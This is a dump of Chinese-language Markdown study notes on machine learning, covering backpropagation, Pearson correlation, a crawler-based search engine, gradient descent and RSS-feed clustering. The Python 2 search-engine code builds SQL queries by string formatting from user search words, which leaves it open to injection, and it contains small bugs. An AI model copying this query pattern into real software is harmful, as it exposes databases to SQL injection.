100: 87 | z[x][y] = 1. 88 | elif val <= -100: 89 | z[x][y] = 0. 90 | else: 91 | z[x][y] = 1.0 / (1.0 + np.exp(-val)) 92 | 93 | return z 94 | 95 | def sigmoid_derivative(z): 96 | return sigmoid(z) * (1. - sigmoid(z)) 97 | 98 | ``` 99 | 100 |  Stochastic Gradient Descent 101 | ```python 102 | # eta is learning rate 103 | def stochasticGradientDescent(self, training_data, epochs, mini_batch_size, eta, test_data = None): 104 | if test_data: 105 | n_test = len(test_data) 106 | n_train = len(training_data) 107 | for j in xrange(epochs): 108 | random.shuffle(training_data) 109 | mini_batches = [training_data[k: k + mini_batch_size] for k in xrange(0, n_train, mini_batch_size)] 110 | for mini_batch in mini_batches: 111 | self.updateMiniBatch(mini_batch, eta) 112 | if test_data: 113 | print 'Epoch %s: %s / %s' % (j, self.evaluate(test_data), n_test) 114 | else: 115 | print 'Epoch %s complete.' % j 116 | 117 | def updateMiniBatch(self, mini_batch, eta): 118 | nabla_b = [np.zeros(b.shape) for b in self.biases] 119 | nabla_w = [np.zeros(w.shape) for w in self.weights] 120 | for x, y in mini_batch: 121 | delta_nabla_b, delta_nabla_w = self.backprob(x, y) 122 | nabla_b = [nb + dnb for nb, dnb in zip(nabla_b, delta_nabla_b)] 123 | nabla_w = [nw + dnw for nw, dnw in zip(nabla_w, delta_nabla_w)] 124 | self.weights = [w - (eta / len(mini_batch)) * nw for w, nw in zip(self.weights, nabla_w)] 125 | self.biases = [b - (eta / len(mini_batch)) * nb for b, nb in zip(self.biases, nabla_b)] 126 | ``` 127 | 128 |  Backpropagation 129 | ```python 130 | def backprob(self, x, y): 131 | nabla_b = [np.zeros(b.shape) for b in self.biases] 132 | nabla_w = [np.zeros(w.shape) for w in self.weights] 133 | 134 | activation = x 135 | activations = [x] 136 | zs = [] 137 | for b, w in zip(self.biases, self.weights): 138 | z = np.dot(w, activation) + b 139 | zs.append(z) 140 | activation = sigmoid(z) 141 | activations.append(activation) 142 | delta = self.cost_derivative(activations[-1], y) * sigmoid_derivative(zs[-1]) 143 | nabla_b[-1] = delta 144 | nabla_w[-1] = np.dot(delta, activations[-2].transpose()) 145 | for l in xrange(2, self.num_layers): 146 | z = zs[-l] 147 | sd = sigmoid_derivative(z) 148 | delta = np.dot(self.weights[-l + 1].transpose(), delta) * sd 149 | nabla_b[-l] = delta 150 | nabla_w[-l] = np.dot(delta, activations[-l - 1].transpose()) 151 | return (nabla_b, nabla_w) 152 | ``` 153 | 154 |   hidden layer 30个Neurons,准确率约为82%. 155 |    156 |   hidden layer 100个Neurons,准确率约为90%. 157 |   完整代码见[Digit Recognition](https://github.com/linghuazaii/digit-recognition) 158 | 159 | ### Reference 160 | - [Andrew NG. Machine Learning](https://www.coursera.org/learn/machine-learning/home/welcome) 161 | - [Michael Nielsen. Neural Networks And Deep Learning](http://neuralnetworksanddeeplearning.com) 162 | 163 | 164 | ### 小结 165 |   **Learning is a HOBBY!** 166 | -------------------------------------------------------------------------------- /machine-learning-pearson-correlation.md: -------------------------------------------------------------------------------- 1 | [Machine Learning]Pearson Correlation 2 | ===================================== 3 | 4 | ### Covariance 5 |   Covariance(协方差)在probability and statistics里是为了衡量两个随机变量的联合可变性,公式如下: 6 |      7 |   E(Expectation),`E(X) = Sum(X1 -> Xn) / n`,当两个随机变量X,Y,X较大的时候,Y也较大,那么`cov(X, Y)`是一个正值,表示X和Y表现的行为是相似的;反之,X较大的时候,Y较小,X较小的时候,Y较大,那么他们的行为是相反的;如果X,Y的表现没什么关系,那么`cov(X, Y) ~ 0`。但是,协方差的大小并不能解释出更多的意义。 8 | 9 | ### Standard Deviation 10 |   Standard Deviation(标准差),标准差体现一个随机变量的分布情况,如果标准差趋向于0,则该随机变量的分布比较集中,否则,则较为分散。公式如下: 11 |      12 | 13 | ### Pearson Correlation 14 |   Pearson Correlation(皮尔森相关),皮尔森相关从两个离散的随机变量里近似出一条线,这条线让所有的变量值离这条线都比较近,得到的值是从`-1 < score < 1`,`-1`表示我讨厌你,`0`表你在我这没有存在感,`1`表示我对你有兴趣。公式如下: 15 |      16 | 17 | ### Euclidean Distance的不足之处 18 |   如果我们看过的电影列表很相似,但是如果我们的个人观点都比较尖锐,那么我们给的评分可能差距很大,这样会导致Eucliean Distance的值偏大,但是事实上我们感兴趣的电影是差不多的,我们的相似性也是很大的。Pearson Correlation就可以比较适用于这种情况。 19 | 20 | ### 例子 21 | ```json 22 | { 23 | "Claudia Puig": { 24 | "Just My Luck": 3.0, 25 | "Snakes on a Plane": 3.5, 26 | "Superman Returns": 4.0, 27 | "The Night Listener": 4.5, 28 | "You, Me and Dupree": 2.5 29 | }, 30 | "Gene Seymour": { 31 | "Just My Luck": 1.5, 32 | "Lady in the Water": 3.0, 33 | "Snakes on a Plane": 3.5, 34 | "Superman Returns": 5.0, 35 | "The Night Listener": 3.0, 36 | "You, Me and Dupree": 3.5 37 | }, 38 | "Jack Matthews": { 39 | "Lady in the Water": 3.0, 40 | "Snakes on a Plane": 4.0, 41 | "Superman Returns": 5.0, 42 | "The Night Listener": 3.0, 43 | "You, Me and Dupree": 3.5 44 | }, 45 | "Lisa Rose": { 46 | "Just My Luck": 3.0, 47 | "Lady in the Water": 2.5, 48 | "Snakes on a Plane": 3.5, 49 | "Superman Returns": 3.5, 50 | "The Night Listener": 3.0, 51 | "You, Me and Dupree": 2.5 52 | }, 53 | "Michael Phillips": { 54 | "Lady in the Water": 2.5, 55 | "Snakes on a Plane": 3.0, 56 | "Superman Returns": 3.5, 57 | "The Night Listener": 4.0 58 | }, 59 | "Mick LaSalle": { 60 | "Just My Luck": 2.0, 61 | "Lady in the Water": 3.0, 62 | "Snakes on a Plane": 4.0, 63 | "Superman Returns": 3.0, 64 | "The Night Listener": 3.0, 65 | "You, Me and Dupree": 2.0 66 | }, 67 | "Toby": { 68 | "Snakes on a Plane": 4.5, 69 | "Superman Returns": 4.0, 70 | "You, Me and Dupree": 1.0 71 | } 72 | } 73 | ``` 74 |   测试数据 75 | ```json 76 | { 77 | "Claudia Puig": { 78 | "Gene Seymour": 0.26747360685805954, 79 | "Jack Matthews": 0.2569179867629838, 80 | "Lisa Rose": 0.7203602702251998, 81 | "Michael Phillips": 0.5412073589719606, 82 | "Mick LaSalle": 0.2318104592769826, 83 | "Toby": 0.2651650429449559 84 | }, 85 | "Gene Seymour": { 86 | "Claudia Puig": 0.26747360685805954, 87 | "Jack Matthews": 0.9804777648345675, 88 | "Lisa Rose": 0.396059017190669, 89 | "Michael Phillips": 0.5251050315105037, 90 | "Mick LaSalle": 0.4117647058823524, 91 | "Toby": 0.643567982536105 92 | }, 93 | "Jack Matthews": { 94 | "Claudia Puig": 0.2569179867629838, 95 | "Gene Seymour": 0.9804777648345675, 96 | "Lisa Rose": 0.4195906791483465, 97 | "Michael Phillips": 0.18171094607790858, 98 | "Mick LaSalle": 0.5484028176193337, 99 | "Toby": 0.826839467166564 100 | }, 101 | "Lisa Rose": { 102 | "Claudia Puig": 0.7203602702251998, 103 | "Gene Seymour": 0.396059017190669, 104 | "Jack Matthews": 0.4195906791483465, 105 | "Michael Phillips": 0.5303300858899116, 106 | "Mick LaSalle": 0.594088525786004, 107 | "Toby": 0.8622074921564968 108 | }, 109 | "Michael Phillips": { 110 | "Claudia Puig": 0.5412073589719606, 111 | "Gene Seymour": 0.5251050315105037, 112 | "Jack Matthews": 0.18171094607790858, 113 | "Lisa Rose": 0.5303300858899116, 114 | "Mick LaSalle": 0.7351470441147054, 115 | "Toby": 0.33995005182504257 116 | }, 117 | "Mick LaSalle": { 118 | "Claudia Puig": 0.2318104592769826, 119 | "Gene Seymour": 0.4117647058823524, 120 | "Jack Matthews": 0.5484028176193337, 121 | "Lisa Rose": 0.594088525786004, 122 | "Michael Phillips": 0.7351470441147054, 123 | "Toby": 0.7223722252956285 124 | }, 125 | "Toby": { 126 | "Claudia Puig": 0.2651650429449559, 127 | "Gene Seymour": 0.643567982536105, 128 | "Jack Matthews": 0.826839467166564, 129 | "Lisa Rose": 0.8622074921564968, 130 | "Michael Phillips": 0.33995005182504257, 131 | "Mick LaSalle": 0.7223722252956285 132 | } 133 | } 134 | ``` 135 |   Pearson得分 136 |   [测试源码](https://github.com/linghuazaii/Machine-Learning/blob/master/recommendation/pearson_correlation.py) 137 | 138 | ### Reference 139 | - [Covariance](https://en.wikipedia.org/wiki/Covariance) 140 | - [Standard deviation](https://en.wikipedia.org/wiki/Standard_deviation) 141 | - [Pearson correlation coefficient](https://en.wikipedia.org/wiki/Pearson_correlation_coefficient) 142 | 143 | ### Note 144 |   大学浪费了不少时光啊,暂时不更了,补一补`probability and statistics`。 145 |   **GOOD LUCK, HAVE FUN!** 146 | -------------------------------------------------------------------------------- /machine-learning-search-and-rank.md: -------------------------------------------------------------------------------- 1 | [Machine Learning]Search And Rank 2 | ================================= 3 | 4 | ### Note 5 |   本文所有代码来自于`Colletive Intelligence`,我只是做一些归纳总结,以及把代码敲一遍~ 6 | 7 | ### Search 8 |   做Search的第一步是爬虫,怎么爬取所有的域名的所有数据,暂时遗留成一个问题,以后做爬虫的话会解决这个以及更多的细节问题。爬虫无非就是下载源网页,将所有的页面建立Index。这里就涉及到网页的结构化解析,以及更重要的关键字提取。引文里涉及的关键字提取比较简单,更复杂的技术性问题先遗留下来,以后研究NLP的时候再解决细节问题。所有的索引都建立好了,下面就是Ranking的问题。 9 | 10 | ### Rank 11 |   Query这一层也有关键词提取,引文的例子比较简单,更复杂的语义分析留到以后研究NLP再解决。引文给的例子我在代码里只实现了前几个,因为最后两个需要再次重建数据,非常的耗时。其一是计算词频打score,其二是计算关键词出现的位置打score,越靠前匹配度越高,其三是句子拆分成关键词,多词查询的时候根据关键词间的距离来打score,距离越近匹配度越高,其四是根据Page Rank算法来打score,得出的是由外链点击进来的Probability,其五是根据链接里是否含有关键词来打score,含有的匹配度更高,其六是最重要的,更具用户对搜索结果的点击数据来做Neural Network,这个以后研究的话再深究。 12 | 13 | ### 其他问题 14 |   Google那么大的搜索量级的数据能做到那么快的展示,虽然线下做训练,但是线上做一些预测还有其他一些算法也得耗时不少吧,怎么做到那么快的response,如果以后有机会做搜索再深究。 15 | 16 | ### 代码 17 | [searchengine.py](https://github.com/linghuazaii/Machine-Learning/blob/master/search_and_rank/searchengine.py) 18 | [search_index.db](https://github.com/linghuazaii/Machine-Learning/blob/master/search_and_rank/search_index.db) 19 | ```python 20 | import urllib2, re 21 | import BeautifulSoup as bsoup 22 | from urlparse import urljoin 23 | from pysqlite2 import dbapi2 as sqlite 24 | 25 | ignore_words = set(['the', 'of', 'to', 'and', 'a', 'in', 'is', 'it']) 26 | 27 | class crawler: 28 | def __init__(self, dbname): 29 | self.con = sqlite.connect(dbname) 30 | 31 | def __del__(self): 32 | self.con.close() 33 | 34 | def db_commit(self): 35 | self.con.commit() 36 | 37 | def get_entry_id(self, table, field, value, create_new = True): 38 | cur = self.con.execute('select rowid from %s where %s=\'%s\'' % (table, field, value)) 39 | res = cur.fetchone() 40 | if res == None: 41 | cur = self.con.execute('insert into %s (%s) values (\'%s\')' % (table, field, value)) 42 | return cur.lastrowid 43 | else: 44 | return res[0] 45 | 46 | def add_to_index(self, url, soup): 47 | if self.is_indexed(url): 48 | return 49 | print "Indexing %s" % url 50 | text = self.get_text_only(soup) 51 | words = self.separate_words(text) 52 | urlid = self.get_entry_id('urllist', 'url', url) 53 | for i in range(len(words)): 54 | word = words[i] 55 | if word in ignore_words: 56 | continue 57 | wordid = self.get_entry_id('wordlist', 'word', word) 58 | self.con.execute('insert into wordlocation(urlid,wordid,location)\ 59 | values (%d,%d,%d)' % (urlid, wordid, i)) 60 | 61 | def get_text_only(self, soup): 62 | v = soup.string 63 | if v == None: 64 | c = soup.contents 65 | result_text = '' 66 | for t in c: 67 | subtext = self.get_text_only(t) 68 | result_text += subtext + '\n' 69 | return result_text 70 | else: 71 | return v.strip() 72 | 73 | def separate_words(self, text): 74 | splitter = re.compile('\\W*') 75 | return [s.lower() for s in splitter.split(text) if s != ''] 76 | 77 | def is_indexed(self, url): 78 | res = self.con.execute('select rowid from urllist where url=\'%s\'' % url).fetchone() 79 | if res != None: 80 | rs = self.con.execute('select * from wordlocation where urlid=%d' % res[0]).fetchone() 81 | if rs != None: 82 | return True 83 | return False 84 | 85 | def add_link_ref(self, url_from, url_to, link_text): 86 | fromid = self.get_entry_id('urllist', 'url', url_from) 87 | toid = self.get_entry_id('urllist', 'url', url_to) 88 | self.con.execute('insert into link values(%d, %d)' % (fromid, toid)) 89 | 90 | def crawl(self, pages, depth = 2): 91 | for i in range(depth): 92 | new_pages = set() 93 | for page in pages: 94 | try: 95 | doc = urllib2.urlopen(page) 96 | except Exception as e: 97 | print "can't open %s (%s)" % (page, e) 98 | continue 99 | soup = bsoup.BeautifulSoup(doc.read()) 100 | self.add_to_index(page, soup) 101 | #print soup.prettify() 102 | 103 | links = soup('a') 104 | for link in links: 105 | if ('href' in dict(link.attrs)): 106 | url = urljoin(page, link['href']) 107 | if url.find('\'') != -1: 108 | continue 109 | url = url.split('#')[0] 110 | if url[0:4] == 'http' and not self.is_indexed(url): 111 | new_pages.add(url) 112 | link_text = self.get_text_only(link) 113 | self.add_link_ref(page, url, link_text) 114 | self.db_commit() 115 | pages = new_pages 116 | 117 | def create_index_tables(self): 118 | try: 119 | self.con.execute('drop table if exists urllist') 120 | self.con.execute('drop table if exists wordlist') 121 | self.con.execute('drop table if exists wordlocation') 122 | self.con.execute('drop table if exists link') 123 | self.con.execute('drop table if exists linwords') 124 | self.con.execute('create table urllist(url)') 125 | self.con.execute('create table wordlist(word)') 126 | self.con.execute('create table wordlocation(urlid,wordid,location)') 127 | self.con.execute('create table link(fromid integer,toid integer)') 128 | self.con.execute('create table linkwords(wordid,linkid)') 129 | self.con.execute('create index wordidx on wordlist(word)') 130 | self.con.execute('create index urlidx on urllist(url)') 131 | self.con.execute('create index wordurlidx on wordlocation(wordid)') 132 | self.con.execute('create index urltoindx on link(toid)') 133 | self.con.execute('create index urlfromidx on link(fromid)') 134 | self.db_commit() 135 | except Exception as e: 136 | print e 137 | 138 | def calculate_page_rank(self, iterations = 20): 139 | self.con.execute('drop table if exists pagerank') 140 | self.con.execute('create table pagerank(urlid primary key, score)') 141 | self.con.execute('insert into pagerank select rowid, 1.0 from urllist') 142 | self.db_commit() 143 | 144 | for i in range(iterations): 145 | print "Iteration %d" % i 146 | for (urlid,) in self.con.execute('select rowid from urllist'): 147 | pr = 0.15 148 | for (linker, ) in self.con.execute('select distinct fromid from link where toid=%d' % urlid): 149 | linking_pr = self.con.execute('select score from pagerank where urlid=%d' % linker).fetchone()[0] 150 | linking_count = self.con.execute('select count(*) from link where fromid=%d' % linker).fetchone()[0] 151 | pr += 0.85 * (linking_pr / linking_count) 152 | self.con.execute('update pagerank set score=%f where urlid=%d' % (pr, urlid)) 153 | self.db_commit() 154 | 155 | class searcher: 156 | def __init__(self, dbname): 157 | self.con = sqlite.connect(dbname) 158 | 159 | def __del__(self): 160 | self.con.close() 161 | 162 | def get_match_rows(self, q): 163 | field_list = 'w0.urlid' 164 | table_list = '' 165 | clause_list = '' 166 | word_ids = [] 167 | 168 | words = q.split(' ') 169 | tablenumber = 0 170 | 171 | for word in words: 172 | wordrow = self.con.execute('select rowid from wordlist where word=\'%s\'' % word).fetchone() 173 | if wordrow != None: 174 | wordid = wordrow[0] 175 | word_ids.append(wordid) 176 | if tablenumber > 0: 177 | table_list += ',' 178 | clause_list += ' and ' 179 | clause_list += 'w%d.urlid=w%d.urlid and ' % (tablenumber - 1, tablenumber) 180 | field_list += ',w%d.location' % tablenumber 181 | table_list += 'wordlocation w%d' % tablenumber 182 | clause_list += 'w%d.wordid=%d' % (tablenumber, wordid) 183 | tablenumber += 1 184 | fullquery = 'select %s from %s where %s' % (field_list, table_list, clause_list) 185 | #print fullquery 186 | cur = self.con.execute(fullquery) 187 | rows = [row for row in cur] 188 | 189 | return rows, word_ids 190 | 191 | def get_scored_list(self, rows, wordids): 192 | total_scores = dict([(row[0], 0) for row in rows]) 193 | 194 | #weights = [(1.0, self.frequency_score(rows))] 195 | #weights = [(1.0, self.location_score(rows))] 196 | weights = [(1.5, self.location_score(rows)), (1.0, self.frequency_score(rows)), 197 | (1.0, self.distance_score(rows)), (1.5, self.page_rank_score(rows))] 198 | 199 | for (weight, scores) in weights: 200 | for url in total_scores: 201 | total_scores[url] += weight * scores[url] 202 | 203 | return total_scores 204 | 205 | def get_url_name(self, rowid): 206 | return self.con.execute('select url from urllist where rowid=%d' % rowid).fetchone()[0] 207 | 208 | def query(self, q): 209 | rows, wordids = self.get_match_rows(q) 210 | scores = self.get_scored_list(rows, wordids) 211 | ranked_scores = sorted([(score, url) for (url, score) in scores.items()], reverse = 1) 212 | for (score, urlid) in ranked_scores[0:10]: 213 | print '%f\t%s' % (score, self.get_url_name(urlid)) 214 | 215 | def normalize_scores(self, scores, small_is_better = 0): 216 | vsmall = 0.00001 217 | if small_is_better: 218 | min_score = min(scores.values()) 219 | return dict([(u, float(min_score) / max(vsmall, l)) for (u, l) in scores.items()]) 220 | else: 221 | max_score = max(scores.values()) 222 | if max_score == 0: 223 | max_score = vsmall 224 | return dict([(u, float(c) / max_score) for (u, c) in scores.items()]) 225 | 226 | def frequency_score(self, rows): 227 | counts = dict([(row[0], 0) for row in rows]) 228 | for row in rows: 229 | counts[row[0]] += 1 230 | return self.normalize_scores(counts) 231 | 232 | def location_score(self, rows): 233 | locations = dict([(row[0], 1000000) for row in rows]) 234 | for row in rows: 235 | loc = sum(row[1:]) 236 | if loc < locations[row[0]]: 237 | locations[row[0]] = loc 238 | return self.normalize_scores(locations, small_is_better =1) 239 | 240 | def distance_score(self, rows): 241 | if len(rows[0]) <= 2: 242 | return dict([(row[0], 1.0) for row in rows]) 243 | 244 | min_distance = dict([(row[0], 1000000) for row in rows]) 245 | 246 | for row in rows: 247 | dist = sum([abs(row[i] - row[i - 1]) for i in range(2, len(row))]) 248 | if dist < min_distance[row[0]]: 249 | min_distance[row[0]] = dist 250 | return self.normalize_scores(min_distance, small_is_better = 1) 251 | 252 | def inbound_link_score(self, rows): 253 | unique_urls = set([row[0] for row in rows]) 254 | inbound_count = dict([(u, self.con.excute('select count(*) from link where toid=%d' % u).fetchone()[0]) for u in unique_urls]) 255 | 256 | return self.normalize_scores(inbound_count) 257 | 258 | def page_rank_score(self, rows): 259 | page_ranks = dict([(row[0], self.con.execute('select score from pagerank where urlid=%d' % row[0]).fetchone()[0]) for row in rows]) 260 | max_rank = max(page_ranks.values()) 261 | normalized_scores = dict([(u, float(l) / max_rank) for (u, l) in page_ranks.items()]) 262 | return normalized_scores 263 | 264 | if __name__ == '__main__': 265 | spider = crawler('search_index.db') 266 | #spider.create_index_tables() 267 | #spider.crawl(['https://en.wikipedia.org/wiki/Concurrency_pattern']) 268 | #spider.calculate_page_rank() 269 | search = searcher('search_index.db') 270 | search.query('parallel programming') 271 | ``` 272 |   代码以`https://en.wikipedia.org/wiki/Concurrency_pattern`为例子,爬取连接大概有16000多条,建立索引和建立Page Rank数据得耗费近一两个小时,比较慢,这里有现成的数据。如果需要爬另外的数据,改下代码就可以。以下是搜索`parallel programming`的结果: 273 | ``` 274 | 4.272585 https://en.wikipedia.org/wiki/Join-pattern 275 | 3.500800 https://en.wikipedia.org/wiki/Multi-threaded 276 | 3.218709 https://en.wikipedia.org/wiki/Software_design_pattern 277 | 3.189411 https://en.wikipedia.org/wiki/Ralph_Johnson_(computer_scientist) 278 | 2.995677 https://en.wikipedia.org/wiki/Thread_pool_pattern 279 | 2.962206 https://en.wikipedia.org/wiki/Design_pattern_(computer_science) 280 | 2.638868 https://en.wikipedia.org/wiki/Barrier_(computer_science) 281 | 2.569933 http://www.se-radio.net/2006/09/episode-29-concurrency-pt-3/ 282 | 2.313369 https://en.wikipedia.org/wiki/Category:Software_design_patterns 283 | 2.280730 https://en.wikipedia.org/wiki/Category:Concurrent_computing 284 | ``` 285 |   结果还是比较靠谱的~ 286 | 287 | ### 小结 288 |   **GOOD LUCK, HAVE FUN!** 289 | -------------------------------------------------------------------------------- /machine-learning-stochastic-gradient-descent.md: -------------------------------------------------------------------------------- 1 | Stochastic Gradient Descent 2 | =========================== 3 | 4 | ### Neural Networks 5 |   Neural Networks是挺有意思的,如果你先前没有了解过,我给你推荐以下的资源: 6 | - [Andrew NG. Machine Learning Coursera](https://www.coursera.org/learn/machine-learning/home/welcome) 7 | - [Ra´ul Rojas Neural Networks](https://page.mi.fu-berlin.de/rojas/neural/neuron.pdf) 8 | - [Neural Networks And Deep Learning](http://neuralnetworksanddeeplearning.com) 9 | 10 |   如果你想对Neural Networks有一个直观的感受,可以在这里体验一下Neural Networks Classification: 11 | - [A Neural Network Playground](http://playground.tensorflow.org) 12 | 13 |   个人推荐先去Rojas的Neural Networks里先了解下Neural Networks的发展,在此之前你得先学习一下Andrew NG的Coursera课程的Linear Regression和Logistic Regression,Neural Networks。Andrew NG的课程有些东西的来由并未说明,这时需要你去拓展,其一是写代码直观感受,其二是Rojas的Neural Networks追本溯源,其三是Michael Nielsen的Neural Networks And Deep Learning一步步优化Neural Networks做[MNIST](http://yann.lecun.com/exdb/mnist/)识别。但是本文不牵扯Neural Networks的一些东西,只说Stochastic Gradient Descent。 14 | 15 | ### Stochastic Gradient Descent 16 |   就由MSE来做Cost函数,因为简单也易于理解,缺点也很明显,受异常值的影响比较大。 17 |   18 |   其中w表示weight,b表示bias。 19 |   20 |   其中v(1...n)表示bias和weight的向量。 21 |   22 |   23 |   如果`△v=-η▽C`,那么: 24 |   25 |   其中η就是learning rate,由上式可知,对于MSE来说,如果η取值合理,Cost会一直下降,直到得到一个最优的解。如果η取值过大,最终不会找到最优解,反而会跨过最优解一直反弹,如果η取值太小,经过的经过的迭代次数会更多,导致计算量变大,这个算是Gradient Descent的由来。 26 |   27 |   对于Neural Networks来说,一般数据量都是非常大的,所以每次计算所有数据的gradient是一个很大的消耗,所以就有了Stochastic Gradient Descent: 28 |   29 |   把n个数据以m大小均分,将会得到`n/m`个minimal batch,对每个batch做Gradient Descent直到处理完所有数据,每一次对所有数据的处理为一次迭代,经过多次迭代达到最优解。 30 | 31 | ### 小结 32 |   Learning is fun. **GOOD LUCK, HAVE FUN!** 33 | -------------------------------------------------------------------------------- /machine-learning-word-vector.md: -------------------------------------------------------------------------------- 1 | [Machine Learning]Word Vector 2 | ============================= 3 | 4 | ### 回顾 5 |   前面说过Pearson Correlation,用来计算两个矩阵的相似度,本章Word Vector里面使用Pearson计算矩阵相似度。 6 | 7 | ### 原理 8 |   给定两份文档如何确定其相似度?这个问题可以延伸到:抓取的文章如果确定几篇文章是相似的,以作相关推荐?如果确定微博上的两个博主具有共同的话题,观念,爱好?或者如何确定几个博客博主是同一类型的,比如说作家,程序员? 9 |   Word Vector,从给定的文档里提取一定数目的关键词,形成矩阵。提取关键词的依据当然有很多(本章的例子比较简单),例如高频词`the`, `an`, `is`等等,短语`go to`, `want to`等等,以及词性做一个筛选,最终留下的词作为关键词。 10 |   然后通过上一篇的Pearson Score来计算距离,举个例子,我收集了50个博主的博客文章,然后统计了300个关键词,这样就有了50个1x300的矩阵,Word Vector总是选择距离最近的两个矩阵合为一个,知道最终只剩下一个矩阵。如图: 11 |     12 | 13 | ### 例子 14 |   我选取了RSS FEED做例子,最终结果为相似的RSS FEED会被归到一块儿。 15 | [feedlist.txt](https://github.com/linghuazaii/Machine-Learning/blob/master/dig_groups/feedlist.txt) 16 | ``` 17 | http://www.cbn.com/cbnnews/world/feed/ 18 | http://feeds.reuters.com/Reuters/worldNews 19 | http://feeds.bbci.co.uk/news/rss.xml 20 | http://news.sky.com/sky-news/rss/home/rss.xml 21 | http://www.cbn.com/cbnnews/us/feed/ 22 | http://feeds.reuters.com/Reuters/domesticNews 23 | http://news.yahoo.com/rss/ 24 | ..... 25 | ``` 26 | 27 | [generate_feed_vector.py](https://github.com/linghuazaii/Machine-Learning/blob/master/dig_groups/generate_feed_vector.py) 28 | ```python 29 | #!/bin/env python 30 | # -*- coding: utf-8 -*- 31 | # This file is auto-generated.Edit it at your own peril. 32 | import feedparser 33 | import re, sys 34 | 35 | reload(sys) 36 | sys.setdefaultencoding('utf-8') 37 | 38 | def get_words(html): 39 | txt = re.compile(r'<[^>]+>').sub('', html) 40 | words = re.compile(r'[^A-Z^a-z]+').split(txt) 41 | 42 | return [word.lower() for word in words if word != ''] 43 | 44 | def get_word_count(url): 45 | doc = feedparser.parse(url) 46 | #print doc 47 | wc = {} 48 | 49 | for e in doc.entries: 50 | if 'summary' in e: 51 | summary = e.summary 52 | else: 53 | summary = e.description 54 | words = get_words(e.title + ' ' + summary) 55 | for word in words: 56 | wc.setdefault(word, 0) 57 | wc[word] += 1 58 | 59 | return doc.feed.title, wc 60 | 61 | def create_word_vector(): 62 | apcount = {} 63 | word_counts = {} 64 | for feedurl in file('feedlist.txt'): 65 | try: 66 | title, wc = get_word_count(feedurl) 67 | word_counts[title] = wc 68 | for word, count in wc.items(): 69 | apcount.setdefault(word, 0) 70 | if count > 1: 71 | apcount[word] += 1 72 | except Exception as e: 73 | print "failed for feed %s" % feedurl 74 | continue 75 | wordlist = [] 76 | for w, bc in apcount.items(): 77 | frac = float(bc) / len(word_counts) 78 | if frac > 0.1 and frac < 0.5: 79 | wordlist.append(w) 80 | 81 | out = file('blogdata.txt', 'w+') 82 | out.write('Blog') 83 | for word in wordlist: 84 | out.write('\t%s ' % word) 85 | out.write("\n") 86 | for blog, wc in word_counts.items(): 87 | out.write(blog) 88 | for word in wordlist: 89 | if word in wc: 90 | out.write("\t%d" % wc[word]) 91 | else: 92 | out.write('\t0') 93 | out.write('\n') 94 | 95 | def main(): 96 | create_word_vector() 97 | 98 | if __name__ == "__main__": 99 | main() 100 | ``` 101 | 102 | [clusters.py](https://github.com/linghuazaii/Machine-Learning/blob/master/dig_groups/clusters.py) 103 | ```python 104 | #!/bin/env python 105 | # -*- coding: utf-8 -*- 106 | # This file is auto-generated.Edit it at your own peril. 107 | from math import sqrt 108 | 109 | def readfile(filename): 110 | lines = [line for line in file(filename)] 111 | colnames = lines[0].strip().split('\t')[1:] 112 | rownames = [] 113 | data = [] 114 | for line in lines[1:]: 115 | p = line.strip().split('\t') 116 | rownames.append(p[0]) 117 | data.append([float(i) for i in p[1:]]) 118 | 119 | return rownames, colnames, data 120 | 121 | def pearson(v1, v2): 122 | sum1 = sum(v1) 123 | sum2 = sum(v2) 124 | 125 | sum1Sq = sum([pow(v, 2) for v in v1]) 126 | sum2Sq = sum([pow(v, 2) for v in v2]) 127 | 128 | pSum = sum([v1[i] * v2[i] for i in range(len(v1))]) 129 | num = pSum - (sum1 * sum2 / len(v1)) 130 | den = sqrt((sum1Sq - pow(sum1, 2) / len(v1)) * (sum2Sq - pow(sum2, 2) / len(v1))) 131 | if den == 0: 132 | return 0 133 | 134 | return 1.0 - num / den 135 | 136 | class bicluster: 137 | def __init__(self, vec, left = None, right = None, distance = 0.0, id = None): 138 | self.left = left 139 | self.right = right 140 | self.vec = vec 141 | self.id = id 142 | self.distance = distance 143 | 144 | def hcluster(rows, distance = pearson): 145 | distances = {} 146 | current_clust_id = -1 147 | clust = [bicluster(rows[i], id = i) for i in range(len(rows))] 148 | while len(clust) > 1: 149 | lowest_pair = (0, 1) 150 | closest = distance(clust[0].vec, clust[1].vec) 151 | for i in range(len(clust)): 152 | for j in range(i + 1, len(clust)): 153 | if (clust[i].id, clust[j].id) not in distances: 154 | distances[(clust[i].id, clust[j].id)] = distance(clust[i].vec, clust[j].vec) 155 | d = distances[(clust[i].id, clust[j].id)] 156 | if d < closest: 157 | closest = d 158 | lowest_pair = (i, j) 159 | mergevec = [(clust[lowest_pair[0]].vec[i] + clust[lowest_pair[1]].vec[i]) / 2.0 for i in range(len(clust[0].vec))] 160 | new_cluster = bicluster(mergevec, left = clust[lowest_pair[0]], right = clust[lowest_pair[1]], distance = closest, id = current_clust_id) 161 | current_clust_id -= 1 162 | new_clust = [clust[i] for i in range(len(clust)) if i not in (lowest_pair[0], lowest_pair[1])] 163 | clust = new_clust 164 | clust.append(new_cluster) 165 | #print "clust len: %s" % len(clust) 166 | #print "clust id: %s" % clust[0].id 167 | return clust[0] 168 | 169 | def print_cluster(clust, labels = None, n = 0): 170 | for i in range(n): 171 | print ' ', 172 | if clust.id < 0: 173 | print '-' 174 | else: 175 | if labels == None: 176 | print clust.id 177 | else: 178 | print labels[clust.id] 179 | if clust.left != None: 180 | print_cluster(clust.left, labels = labels, n = n + 1) 181 | if clust.right != None: 182 | print_cluster(clust.right, labels = labels, n = n + 1) 183 | 184 | def create_cluster(): 185 | blognames, words, data = readfile('blogdata.txt') 186 | clust = hcluster(data) 187 | print_cluster(clust, labels = blognames) 188 | 189 | def main(): 190 | create_cluster() 191 | 192 | if __name__ == "__main__": 193 | main() 194 | ``` 195 | 196 | **Result** 197 | ``` 198 | - 199 | - 200 | - 201 | The Daily Puppy | Pictures of Puppies 202 | David Kleinert Photography 203 | - 204 | NASA Image of the Day 205 | - 206 | Utah Jazz 207 | - 208 | - 209 | Dictionary.com Word of the Day 210 | - 211 | Resources » Surfnetkids 212 | Utah.gov News Provider 213 | - 214 | - 215 | WIRED 216 | - 217 | NOVA | PBS 218 | - 219 | Latest News Articles from Techworld 220 | - 221 | BBC News - Business 222 | - 223 | - 224 | - 225 | PCWorld 226 | Macworld 227 | - 228 | Animal of the day 229 | - 230 | Nature - Issue - nature.com science feeds 231 | Latest Science News -- ScienceDaily 232 | - 233 | Technology : NPR 234 | - 235 | BBC News - Technology 236 | NYT > Technology 237 | - 238 | UEN News 239 | - 240 | Education : NPR 241 | - 242 | - 243 | AP 